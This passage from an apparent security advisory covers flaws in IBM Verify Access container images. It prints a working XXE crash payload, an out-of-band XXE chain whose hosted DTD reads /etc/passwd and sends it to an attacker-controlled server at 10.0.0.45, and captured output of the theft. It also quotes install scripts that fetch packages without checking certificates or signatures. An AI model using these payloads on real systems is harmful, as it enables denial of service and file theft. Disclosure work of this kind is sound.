encoding=\"utf-8\" ?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n \u003c?xml version=\u00271.0\u0027 encoding=\u0027utf-8\u0027 ?\u003e\n \u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\n \u003cSOAP-ENV:Body\u003e\n \u003cns1:pingResponse xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\n \u003cns1:pingReturn\u003e952467756\u003c/ns1:pingReturn\u003e\n \u003c/ns1:pingResponse\u003e\n \u003c/SOAP-ENV:Body\u003e\n \u003c/SOAP-ENV:Envelope\u003e\n\nWe can also send a specific XML External Entity (XXE) that will crash the remote DSC instance:\n\n kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -X POST -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003c!DOCTYPE foo [ \u003c!ELEMENT foo ANY \u003e \u003c!ENTITY xxe SYSTEM \"file:///dev/random\"\u003e]\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e\u0026xxe;\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n curl: (52) Empty reply from server\n\n\nWhen debugging this issue, it appears there is a null pointer dereference in the method `DSessWrapper::ping(void*) ()` defined in `/lib64/libamdsc_interface.so` library:\n\n [root@container-02]# ps -auxww | grep dscd\n 6000 2093037 3.4 0.5 427936 40884 ? Ssl 20:07 0:00 /opt/dsc/bin/dscd -c /var/dsc/etc/dsc.conf.1 -f -j\n root 2093269 0.0 0.0 12140 1092 pts/0 S+ 20:07 0:00 grep --color=auto dscd\n [root@container-02]# gdb -p 2093037\n [...]\n (gdb) c\n Continuing. \n [----------------------------------registers-----------------------------------]\n RAX: 0x0 \n RBX: 0x7fec38006110 --\u003e 0x7fecaf4df160 --\u003e 0x7fecaf280e20 --\u003e 0x4100261081058b48 \n RCX: 0x7fec38000b60 --\u003e 0x1000100030005 \n RDX: 0x7fec38025900 --\u003e 0x7fec38021c90 --\u003e 0x7fec38026230 --\u003e 0x7fec38025dc0 --\u003e 0x0 \n RSI: 0x4 \n RDI: 0x0 \n RBP: 0x7fec2804f7c0 --\u003e 0x7fecb0297548 --\u003e 0x7fecb0079560 --\u003e 0x480021e921058b48 \n RSP: 0x7feca642fc10 --\u003e 0x1d2e480 --\u003e 0x7fecaf4dfbf8 --\u003e 0x7fecaf292870 --\u003e 0x410024f509058b48 \n RIP: 0x7fecb007a595 --\u003e 0x48ffffca04e8188b \n R8 : 0x7fec38000b74 --\u003e 0x3000600060005 \n R9 : 0x4 \n R10: 0x2f (\u0027/\u0027)\n R11: 0x7fecaabb2674 --\u003e 0x29058b48fb894853 \n R12: 0xffffffff \n R13: 0x7feca642fca0 --\u003e 0x7fec380312f0 (\"/DSess/services/DSess\")\n R14: 0x7feca642fce0 --\u003e 0x7feca642fcf0 --\u003e 0x7f00676e6970 \n R15: 0x0\n EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0x7fecb007a58a \u003c_ZN12DSessWrapper4pingEPv+154\u003e: call QWORD PTR [rax+0x38]\n 0x7fecb007a58d \u003c_ZN12DSessWrapper4pingEPv+157\u003e: mov esi,0x4\n 0x7fecb007a592 \u003c_ZN12DSessWrapper4pingEPv+162\u003e: mov rdi,rax\n =\u003e 0x7fecb007a595 \u003c_ZN12DSessWrapper4pingEPv+165\u003e: mov ebx,DWORD PTR [rax]\n 0x7fecb007a597 \u003c_ZN12DSessWrapper4pingEPv+167\u003e: call 0x7fecb0076fa0 \u003c_ZdlPvm@plt\u003e\n 0x7fecb007a59c \u003c_ZN12DSessWrapper4pingEPv+172\u003e: mov rdi,QWORD PTR [rsp+0x18]\n 0x7fecb007a5a1 \u003c_ZN12DSessWrapper4pingEPv+177\u003e: mov rax,QWORD PTR [rdi]\n 0x7fecb007a5a4 \u003c_ZN12DSessWrapper4pingEPv+180\u003e: call QWORD PTR [rax+0x2f0]\n [------------------------------------stack-------------------------------------]\n 0000| 0x7feca642fc10 --\u003e 0x1d2e480 --\u003e 0x7fecaf4dfbf8 --\u003e 0x7fecaf292870 --\u003e 0x410024f509058b48 \n 0008| 0x7feca642fc18 --\u003e 0x7fecaf292d8e --\u003e 0xda89481d74c08548 \n 0016| 0x7feca642fc20 --\u003e 0x7fec28040830 --\u003e 0x7fecaf4e00a0 --\u003e 0x7fecaf29b5a0 --\u003e 0x4100246a21058b48 \n 0024| 0x7feca642fc28 --\u003e 0x1e3f6e0 --\u003e 0x7fecaf4e1120 --\u003e 0x7fecaf2b2450 --\u003e 0x530022f9a9058b48 \n 0032| 0x7feca642fc30 --\u003e 0x7feca642fc80 --\u003e 0x7feca642fc90 --\u003e 0x7fec30071c00 --\u003e 0x50 (\u0027P\u0027)\n 0040| 0x7feca642fc38 --\u003e 0x7fec3800e720 --\u003e 0x7fecaf4dece8 --\u003e 0x7fecaf27a770 --\u003e 0x4800267369058b48 \n 0048| 0x7feca642fc40 --\u003e 0x7fec38006110 --\u003e 0x7fecaf4df160 --\u003e 0x7fecaf280e20 --\u003e 0x4100261081058b48 \n 0056| 0x7feca642fc48 --\u003e 0x7fecaf27a8a1 --\u003e 0xf2e668debc48941 \n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n 0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so\n gdb-peda$ bt\n #0 0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so\n #1 0x00007fecaf27a8a1 in tivsec_axiscpp::ServerAxisEngine::invoke(tivsec_axiscpp::MessageData*) () from target:/lib64/libtivsec_axis_server.so\n #2 0x00007fecaf27b0d2 in tivsec_axiscpp::ServerAxisEngine::process(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so\n #3 0x00007fecaf297156 in process_request(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so\n #4 0x00007fecb02a3293 in AMWSMSServiceClient::processRequest(AMWSMSService::WorkerRequest\u0026, bool) () from target:/lib64/libamdsc_server.so\n #5 0x00007fecb02a3ff8 in AMWSMSService::workerThreadRun() () from target:/lib64/libamdsc_server.so\n #6 0x00007fecb02a4089 in start_worker_thread () from target:/lib64/libamdsc_server.so\n #7 0x00007fecaec801ca in start_thread () from target:/lib64/libpthread.so.0\n #8 0x00007fecae6d3d83 in clone () from target:/lib64/libc.so.6\n\nI can also confirm the null pointer dereference in the `dmesg` output of the `container-02` test server:\n\n [899328.145854] dscd[2106406]: segfault at 0 ip 00007f18e53ff595 sp 00007f18db93ac10 error 4 in libamdsc_interface.so[7f18e53ec000+30000]\n [899485.595069] dscd[2107491]: segfault at 0 ip 00007f25a6041595 sp 00007f259c9cdc10 error 4 in libamdsc_interface.so[7f25a602e000+30000]\n [899575.542524] dscd[2109718]: segfault at 0 ip 00007f331fde5595 sp 00007f3316938c10 error 4 in libamdsc_interface.so[7f331fdd2000+30000]\n [899614.404309] dscd[2111181]: segfault at 0 ip 00007fec9cad4595 sp 00007fec9d29dc10 error 4 in libamdsc_interface.so[7fec9cac1000+30000]\n [899761.869511] dscd[2112040]: segfault at 0 ip 00007f86cf8a0595 sp 00007f86c5edfc10 error 4 in libamdsc_interface.so[7f86cf88d000+30000]\n\nI can confirm the verify-access-dsc instance crashes on container-02 as shown below. \n\nBefore the PoC, the verify-access-dsc instance is running:\n\n [root@container-02]# podman ps\n CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES\n e462789b901b ibmcom/verify-access-runtime/10.0.4.0:20220926.6 28 hours ago Up 28 hours ago (healthy) 0.0.0.0:9443-\u003e9443/tcp verify-access-runtime\n 0ff1b85073d6 ibmcom/verify-access-dsc/10.0.4.0:20220926.6 28 hours ago Up 28 minutes ago (healthy) 0.0.0.0:8443-8444-\u003e8443-8444/tcp verify-access-dsc\n\nAfter the PoC, the verify-access-dsc instance does not run anymore:\n\n [root@container-02]# podman ps\n CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES\n e462789b901b ibmcom/verify-access-runtime/10.0.4.0:20220926.6 28 hours ago Up 28 hours ago (healthy) 0.0.0.0:9443-\u003e9443/tcp verify-access-runtime\n [root@container-02]#\n\nAn attacker with the dsc-client SSL certificate can crash the DSC servers and crash the entire authentication system. \n\n\n\n## Details - XML External Entity (XXE) in dscd \n\nIt was observed that the DSC (Distributed Session Cache) servers are vulnerable to XML External Entity (XXE) attacks. DSC servers are used to store session information. \n\nThe DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp. \n\nWith a client certificate, we can reach the `/DSess/services/DSess` API. \n\nContent of the `payload.txt` file containing the XXE payload that will be sent to the remote DSC server:\n\n \u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\n \u003c!DOCTYPE foo [\n \u003c!ENTITY % xxe SYSTEM \"http://10.0.0.45/dtd.xml\"\u003e\n %xxe;\n ]\u003e\n \u003cfoo\u003e\u003c/foo\u003e\n \u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\n \u003cSOAP-ENV:Body\u003e\n \u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\n \u003cns1:something\u003eX\u003c/ns1:something\u003e\n \u003c/ns1:ping\u003e\n \u003c/SOAP-ENV:Body\u003e\n \u003c/SOAP-ENV:Envelope\u003e\n\n\nContent of the `dtd.xml` file hosted on http://10.0.0.45/. This DTD file is referenced by the `payload.txt` file:\n\n kali% cat /var/www/html/dtd.xml \n \u003c!ENTITY % file SYSTEM \"file:///etc/passwd\"\u003e\n \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; exfiltrate SYSTEM \u0027http://10.0.0.45/?x=%file;\u0027\u003e\"\u003e\n %eval;\n %exfiltrate;\n\nSending the previous payload will result in an exception on the remote DSC server:\n\n kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027@payload.txt\u0027 -v\n * Trying 10.0.0.16:8443... \n * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)\n [...]\n \u003e POST /DSess/services/DSess HTTP/1.1\n \u003e Host: dsc-02.test.lan:8443\n \u003e User-Agent: curl/7.82.0\n \u003e Accept: */*\n \u003e SOAPAction: \"ping\"\n \u003e Content-Length: 453\n \u003e Content-Type: application/x-www-form-urlencoded\n \u003e \n * Mark bundle as not supporting multiuse\n \u003c HTTP/1.1 200 OK\n \u003c Server: Apache Axis C++/1.6.a\n \u003c Connection: close\n \u003c Content-Length: 330\n \u003c Content-Type: text/xml\n \u003c \n \u003c?xml version=\u00271.0\u0027 encoding=\u0027utf-8\u0027 ?\u003e\n \u003cSOAP-ENV:Envelope\u003e\n \u003cSOAP-ENV:Body\u003e\n \u003cSOAP-ENV:Fault\u003e\n \u003cfaultcode\u003eSOAP-ENV:Server\u003c/faultcode\u003e\n \u003cfaultstring\u003eUnknown exception\u003c/faultstring\u003e\n \u003cfaultactor\u003eserver name:listen port\u003c/faultactor\u003e\n \u003cdetail\u003eUnknown Exception has occured\u003c/detail\u003e\n \u003c/SOAP-ENV:Fault\u003e\n \u003c/SOAP-ENV:Body\u003e\n \u003c/SOAP-ENV:Envelope\u003e\n \n * Closing connection 0\n * TLSv1.2 (OUT), TLS alert, close notify (256):\n\n\nAt the same time, when sniffing the HTTP connections to the remote HTTP server providing `http://10.0.0.45/?x=%file`, we can observe HTTP requests from the DSC server (acting as a HTTP client). \n\nThere is a successful exfiltration of the `/etc/passwd` file of the DSC instance - this file was specified in the `dtd.xml` file at `http://10.0.0.45/dtd.xml`, used by the malicious payload:\n\n kali# tcpdump -n -i eth0 -s0 -X port 80\n tcpdump: verbose output suppressed, use -v[v]... for full protocol decode\n listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes\n 10:01:12.655204 IP 10.0.0.16.60254 \u003e 10.0.0.45.80: Flags [P.], seq 1:753, ack 1, win 229, options [nop,nop,TS val 2959987485 ecr 3936552717], length 752: HTTP: GET /root:x:0:0:root:/root:/bin/bash\n [...]\n 0x0030: eaa3 070d 4745 5420 2f72 6f6f 743a 783a ....GET./root:x:\n 0x0040: 303a 303a 726f 6f74 3a2f 726f 6f74 3a2f 0:0:root:/root:/\n 0x0050: 6269 6e2f 6261 7368 0a62 696e 3a78 3a31 bin/bash.bin:x:1\n 0x0060: 3a31 3a62 696e 3a2f 6269 6e3a 2f73 6269 :1:bin:/bin:/sbi\n 0x0070: 6e2f 6e6f 6c6f 6769 6e0a 6461 656d 6f6e n/nologin.daemon\n 0x0080: 3a78 3a32 3a32 3a64 6165 6d6f 6e3a 2f73 :x:2:2:daemon:/s\n 0x0090: 6269 6e3a 2f73 6269 6e2f 6e6f 6c6f 6769 bin:/sbin/nologi\n 0x00a0: 6e0a 6164 6d3a 783a 333a 343a 6164 6d3a n.adm:x:3:4:adm:\n 0x00b0: 2f76 6172 2f61 646d 3a2f 7362 696e 2f6e /var/adm:/sbin/n\n 0x00c0: 6f6c 6f67 696e 0a6c 703a 783a 343a 373a ologin.lp:x:4:7:\n 0x00d0: 6c70 3a2f 7661 722f 7370 6f6f 6c2f 6c70 lp:/var/spool/lp\n 0x00e0: 643a 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a d:/sbin/nologin. \n 0x00f0: 7379 6e63 3a78 3a35 3a30 3a73 796e 633a sync:x:5:0:sync:\n 0x0100: 2f73 6269 6e3a 2f62 696e 2f73 796e 630a /sbin:/bin/sync. \n 0x0110: 7368 7574 646f 776e 3a78 3a36 3a30 3a73 shutdown:x:6:0:s\n 0x0120: 6875 7464 6f77 6e3a 2f73 6269 6e3a 2f73 hutdown:/sbin:/s\n 0x0130: 6269 6e2f 7368 7574 646f 776e 0a68 616c bin/shutdown.hal\n 0x0140: 743a 783a 373a 303a 6861 6c74 3a2f 7362 t:x:7:0:halt:/sb\n 0x0150: 696e 3a2f 7362 696e 2f68 616c 740a 6d61 in:/sbin/halt.ma\n 0x0160: 696c 3a78 3a38 3a31 323a 6d61 696c 3a2f il:x:8:12:mail:/\n 0x0170: 7661 722f 7370 6f6f 6c2f 6d61 696c 3a2f var/spool/mail:/\n 0x0180: 7362 696e 2f6e 6f6c 6f67 696e 0a6f 7065 sbin/nologin.ope\n 0x0190: 7261 746f 723a 783a 3131 3a30 3a6f 7065 rator:x:11:0:ope\n 0x01a0: 7261 746f 723a 2f72 6f6f 743a 2f73 6269 rator:/root:/sbi\n 0x01b0: 6e2f 6e6f 6c6f 6769 6e0a 6761 6d65 733a n/nologin.games:\n 0x01c0: 783a 3132 3a31 3030 3a67 616d 6573 3a2f x:12:100:games:/\n 0x01d0: 7573 722f 6761 6d65 733a 2f73 6269 6e2f usr/games:/sbin/\n 0x01e0: 6e6f 6c6f 6769 6e0a 6674 703a 783a 3134 nologin.ftp:x:14\n 0x01f0: 3a35 303a 4654 5020 5573 6572 3a2f 7661 :50:FTP.User:/va\n 0x0200: 722f 6674 703a 2f73 6269 6e2f 6e6f 6c6f r/ftp:/sbin/nolo\n 0x0210: 6769 6e0a 6e6f 626f 6479 3a78 3a36 3535 gin.nobody:x:655\n 0x0220: 3334 3a36 3535 3334 3a4b 6572 6e65 6c20 34:65534:Kernel. \n 0x0230: 4f76 6572 666c 6f77 2055 7365 723a 2f3a Overflow.User:/:\n 0x0240: 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a 6973 /sbin/nologin.is\n 0x0250: 616d 3a78 3a36 3030 303a 3630 3030 3a3a am:x:6000:6000::\n 0x0260: 2f68 6f6d 652f 6973 616d 3a2f 6269 6e2f /home/isam:/bin/\n 0x0270: 6261 7368 0a69 766d 6772 3a78 3a36 3030 bash.ivmgr:x:600\n 0x0280: 313a 3630 3031 3a41 6363 6573 7320 4d61 1:6001:Access.Ma\n 0x0290: 6e61 6765 7220 5573 6572 3a2f 6f70 742f nager.User:/opt/\n 0x02a0: 506f 6c69 6379 4469 7265 6374 6f72 3a2f PolicyDirector:/\n 0x02b0: 6269 6e2f 6661 6c73 650a 7469 766f 6c69 bin/false.tivoli\n 0x02c0: 3a78 3a36 3030 323a 3630 3032 3a4f 776e :x:6002:6002:Own\n 0x02d0: 6572 206f 6620 5469 766f 6c69 2043 6f6d er.of.Tivoli.Com\n [...]\n\nAn attacker can read any file located in the instance - the DSC server will send any file specified in the payload to an attacker-controlled HTTP server. \n\nAn attacker with the dsc-client SSL certificate can exfiltrate any sensitive information from the instance. \n\n\n\n## Details - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)\n\nIt was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp use insecure communications to download several rpm and zip files that will then be installed or decompressed as root. \n\nThe `/usr/sbin/install_isva.sh` script contains insecure downloading of rpm files and zip files. These rpm files will then be installed as root. \n\nAn attacker located on the network can inject malicious rpm or zip files into the authentication platform and take control over the entire authentication platform. \n\nThere are 3 different `/usr/sbin/install_isva.sh` scripts found in these images but they share the same vulnerable code:\n\n kali-docker# sha256sum **/install_isva.sh \n 1c851f579baeda9d3c11e7721aaa5960dc6a3d6b052bcc8a46979d0634e31892 _verify-access-dsc.tar/787d9cec79e27fccd75a56b7101b39da38161f9d3749d6d0fd7cfcc8252aca34/usr/sbin/install_isva.sh\n 00f2ca8ad004af9c9e16b6cfdf480dcdb52dc36c7ff64df2bcc34495f6a9ae8d _verify-access-runtime.tar/694cb5f84eff9a4b0aac37a4bd9f65116051953f3aee5e4e998af5938e684a5e/usr/sbin/install_isva.sh\n 8a59d7f89c6d587d9b764b9e4748cf0d20d406f65433a813464b32a13745f6da _verify-access-wrp.tar/937031a6ab4bc7bd504dcbee8d242f181e904c1722489077cf468daae176e2da/usr/sbin/install_isva.sh\n\nVulnerable code in verify-access-dsc - download over HTTP or without checking the SSL certificate (lines 24, 60 and 82) and installation of packages as root without checking the signatures (line 76):\n\nContent of `/usr/sbin/install_isva.sh` in verify-access-dsc:\n\n[code:shell]\n22 files=/root/files.txt\n23 \n24 curl -k ${WEBSERVER}/ -o $files \n[...]\n38 #\n39 # Install each of our RPMs. \n40 #\n41 \n42 pkgs=\"gskcrypt64 \\\n43 gskssl64 \\\n44 Base-ISVA \\\n45 idsldap-license64 \\\n46 idsldap-cltbase64 \\\n47 idsldap-clt64bit64 \\\n48 Pdlic-PD \\\n49 TivSecUtl-TivSec \\\n50 PDRTE-PD \\\n51 PDWebRTE-PD \\\n52 PDWebDSC-PD\"\n53 \n54 for pkg in $pkgs; do\n55 echo \"Installing $pkg\"\n56 \n57 # Download and install the file. \n58 rpm_file=`locate_rpm_file $pkg`\n59 \n60 curl -fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file\n[...]\n76 rpm -i $extra_args /root/$rpm_file\n[...]\n78 # Download the include file and delete all files not included in the file. \n79 include=`rpm -qp /root/$rpm_file --qf \"%{NAME}.include\"`\n80 include_file=/root/$include\n81 \n82 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e\n83 \n84 if [ $rc -eq 0 -a -f $include_file ] ; then\n85 # Convert the include file to be regular expression based instead of\n86 # glob based. \n87 sed -i \"s|\\*|.*|g\" $include_file\n88 \n89 for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do\n90 if [ -f $entry ] ; then\n91 rm -f $entry\n92 fi\n93 done\n94 fi\n[/code]\n\nThe code in verify-access-wrp is also very similar and shares the same vulnerabilities. \n\nVulnerable code in verify-access-runtime - same vulnerability in `/usr/sbin/install_isva.sh` with an additional vulnerability with the insecure download, due to the `-k` option on line 117 (alias to `--insecure`) and extraction of zip files as root in line 119:\n\n[code:shell]\n28 files=/root/files.txt\n29 \n30 curl -k ${WEBSERVER}/ -o $files\n[...]\n41 pkgs=\"gskcrypt64 \\\n42 gskssl64 \\\n43 Base-ISVA \\\n44 PDlic-PD \\\n45 TivSecUtl-TivSec \\\n46 PDRTE-PD \\\n47 PDWebWAPI-PD \\\n48 PDWebDSC-PD \\\n49 VerifyAccessRuntimeFeatures \\\n50 MesaConfig \\\n51 FIM \\\n52 RBA\"\n53 \n54 for pkg in $pkgs; do\n55 echo \"Installing $pkg\"\n56 \n57 # Download and install the file. \n58 rpm_file=`locate_rpm_file $pkg`\n59 \n60 curl --fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file\n[...]\n78 rpm -i $extra_args /root/$rpm_file\n79 \n80 # Download the include file and delete all files not included in the file. \n81 include=`rpm -qp /root/$rpm_file --qf \"%{NAME}.include\"`\n82 include_file=/root/$include\n83 \n84 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e\n85 \n86 if [ $rc -eq 0 -a -f $include_file ] ; then\n87 # Convert the include file to be regular expression based instead of\n88 # glob based. \n89 sed -i \"s|\\*|.*|g\" $include_file\n90 \n91 for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do\n92 if [ -f $entry ] ; then\n93 rm -f $entry\n94 fi\n95 done\n96 fi\n[...]\n108 zips=\"\\\n109 com.ibm.tscc.rtss.wlp.zip:/opt/rtss \\\n110 com.ibm.isam.common.eclipse.wlp.zip:/opt/IBM \\\n111 pdjrte-0.0.0-0.zip:/opt\"\n112 \n113 for entry in $zips; do\n114 zip=`echo $entry | cut -f 1 -d \u0027:\u0027`\n115 dst=`echo $entry | cut -f 2 -d \u0027:\u0027`\n116 \n117 curl --fail -s -k ${WEBSERVER}/$zip -o /root/$zip\n118 mkdir -p $dst\n119 unzip -q /root/$zip -d $dst\n120 \n121 rm -f /root/$zip\n122 done\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)\n\nIt was observed that the Docker image verify-access-runtime insecurely downloads zip files. \n\nAn attacker located on the network can inject malicious zip files into the platform and take control over the entire platform. \n\nThe `/usr/sbin/install_java_liberty.sh` script contains insecure downloading of zip files. These zip files will then be extracted as root into the `/opt/java`, `/opt/ibm`, `/opt/oracle/jdbc` and `/opt/IBM/db2` directories, providing WebSphere Liberty binaries (that will then be used to provide executable code). \n\nIt is also possible to remotely delete any file as root (lines 61 to 65). \n\nVulnerable code in `/usr/sbin/install_java_liberty.sh`:\n\n[code:shell]\n14 web_files=/root/files.txt\n15 \n16 locate_file()\n17 {\n18 grep \"$1\" $web_files | cut -f 2 -d \u0027\"\u0027\n19 }\n20 curl -k ${WEBSERVER}/ -o $web_files\n21\n[...]\n29 #\n30 # Install each of our zip files. \n31 #\n32 \n33 zips=\"\\\n34 ibm-semeru-open-jre_x64_linux_11.*.tar.gz:/opt/java \\\n35 liberty.*.zip:/opt/ibm \\\n36 oracle_jdbc_.*.zip:/opt/oracle/jdbc \\\n37 ibm-db2-jdbc.*.tar.gz:/opt/IBM/db2\"\n38 \n39 for entry in $zips; do\n40 zip=`echo $entry | cut -f 1 -d \u0027:\u0027`\n41 dst=`echo $entry | cut -f 2 -d \u0027:\u0027`\n42 \n43 # Download and install the file. \n44 zip_file=`locate_file $zip`\n45 \n46 curl --fail -s -k ${WEBSERVER}/$zip_file -o /root/$zip_file\n47 \n48 mkdir -p $dst\n49 \n50 set +e; echo $zip | grep -q .zip; rc=$?; set -e\n51 if [ $rc -eq 0 ] ; then\n52 unzip -q /root/$zip_file -d $dst\n53 exclude=`echo $zip_file | sed \"s|.zip|.exclude|g\"`\n54 else\n55 tar -x -C $dst -f /root/$zip_file\n56 exclude=`echo $zip_file | sed \"s|.tar.gz|.exclude|g\"`\n57 fi\n58 \n59 exclude_file=/root/$exclude\n60 \n61 set +e; curl --fail -s -k ${WEBSERVER}/$exclude -o $exclude_file; rc=$?; set -e\n62 \n63 if [ $rc -eq 0 -a -s $exclude_file ] ; then\n64 cd $dst\n65 cat $exclude_file | xargs rm -rf\n66 fi\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure Repository configuration\n\nIt was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure CentOS repositories:\n\n- - The transport is done over HTTP (in clear-text) - instead of HTTPS. \n- - The check of the signature is disabled. \n- - These repositories will be enabled by default. \n\nAn attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious RPMs and take control over the entire platform. \n\nThe `/usr/sbin/install_system.sh` script in these 3 images will enable 4 remote repositories over HTTP and will disable the check of signature of the downloaded packages from these repositories:\n\n 31 centos_repo_file=\"/etc/yum.repos.d/centos.repo\"\n 32 \n 33 cat \u003c\u003cEOT \u003e\u003e $centos_repo_file\n 34 [CentOS-8_base]\n 35 name = CentOS-8 - Base\n 36 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os\n 37 gpgcheck = 0\n 38 enabled = 1 \n 39 \n 40 [CentOS-8_appstream]\n 41 name = CentOS-8 - AppStream\n 42 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os\n 43 gpgcheck = 0 \n 44 enabled = 1\n 45 EOT\n [...]\n 98 #\n 99 # Enable install of the busybox RPM from the Fedora repository. \n 100 #\n 101 \n 102 fedora_repo_file=\"/etc/yum.repos.d/fedora.repo\"\n 103 \n 104 cat \u003c\u003cEOT \u003e\u003e $fedora_repo_file\n 105 [fedora] \n 106 name=Fedora \n 107 metalink=https://mirrors.fedoraproject.org/metalink?repo=fedora-33\u0026arch=x86_64\n 108 enabled=1\n 109 gpgcheck=0\n 110 \n 111 [fedora-updates]\n 112 name=Fedora Updates\n 113 metalink=https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33\u0026arch=x86_64\n 114 enabled=1\n 115 gpgcheck=0\n 116 EOT\n\nIt was confirmed that this configuration appears in the verify-access-runtime instance in the live system:\n\n [root@container-01]# for i in $(podman ps | grep -v NAMES | awk \u0027{ print $1 }\u0027); do podman ps | grep $i; podman exec -it $i cat /etc/yum.repos.d/centos.repo;echo;done\n 4262005f3646 ibmcom/verify-access/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:7443-\u003e9443/tcp verify-access\n cat: /etc/yum.repos.d/centos.repo: No such file or directory\n \n c930c46acd66 ibmcom/verify-access-runtime/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:9443-\u003e9443/tcp verify-access-runtime\n name = CentOS-8 - Base\n baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os\n gpgcheck = 0\n enabled = 1\n \n [CentOS-8_appstream]\n name = CentOS-8 - AppStream\n baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os\n gpgcheck = 0\n enabled = 1\n \n 48f1b1e8f782 ibmcom/verify-access-dsc/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:8443-8444-\u003e8443-8444/tcp verify-access-dsc\n cat: /etc/yum.repos.d/centos.repo: No such file or directory\n \n [root@container-01]#\n\nFurthermore, the script `/usr/sbin/install_system.sh` will insecurely download programs and install them as root, using the previous insecure repositories:\n\n[code:shell]\n 48 # Install tools required for container build process. \n 49 #\n 50 \n 51 microdnf -y install unzip shadow-utils jansson openssl libxslt \\\n 52 libnsl2 gzip cpio tar\n[...]\n 55 # We have an issue where RedHat periodically introduces a dependency on\n 56 # openssl-pkcs11. We don\u0027t actually need this package and so we manually remove\n 57 # it if it has been installed. \n 58 #\n 59 \n 60 if [ `rpm -q -a | grep openssl-pkcs11 | wc -l` -ne 0 ] ; then\n 61 rpm --erase openssl-pkcs11\n 62 fi\n[...]\n 70 rpms=\"\"\n 71 for lang in en cs de es fi fr hu it ja ko nl pl pt ru zh; do\n 72 rpms=\"$rpms glibc-langpack-$lang\"\n 73 done\n[...]\n122 microdnf -y install busybox\n[/code]\n\n\n\n## Details - Additional repository configuration (potential supply-chain attack)\n\nIt was observed that the Docker images verify-access-runtime and verify-access-wrp use a third-party repository configuration, obtained when retrieving the external file at `https://repo.symas.com/configs/SOFL/rhel8/sofl.repo`:\n\nContent of `/usr/sbin/install_system.sh`:\n\n[code:shell]\n47 #\n48 # Install OpenLDAP. This is no longer provided by CentOS. \n49 #\n50 \n51 sofl_repo_file=\"/etc/yum.repos.d/sofl.repo\"\n52 \n53 curl https://repo.symas.com/configs/SOFL/rhel8/sofl.repo \\\n54 -o 